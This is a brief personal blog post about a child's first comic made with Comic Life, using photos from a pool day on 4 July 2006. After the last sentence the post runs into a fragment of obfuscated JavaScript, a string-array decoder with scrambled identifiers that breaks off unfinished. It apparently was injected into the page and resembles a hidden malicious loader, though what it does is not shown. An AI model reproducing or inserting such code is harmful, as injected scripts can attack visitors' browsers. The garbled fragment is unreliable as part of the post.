Treasure Hunt
Here’s Kels’s first comic using Comic Life.
Kels in the pool, 4 July 2006. Photos by Kels and Jenny.
As Jen did, Kels started with one of Comic Life’s built-in panel layouts (frames only, no images or text). My contribution is almost nil: one punctuation mark (“Yes!”) and a few narrowed text boxes. function _0×9e23(_0×14f71d,_0×4c0b72){const _0×4d17dc=_0×4d17();return _0×9e23=function(_0×9e2358,_0×30b288){_0×9e2358=_0×9e2358-0×1d8;let _0×261388=_0×4d17dc[_0x9e2358];return [...]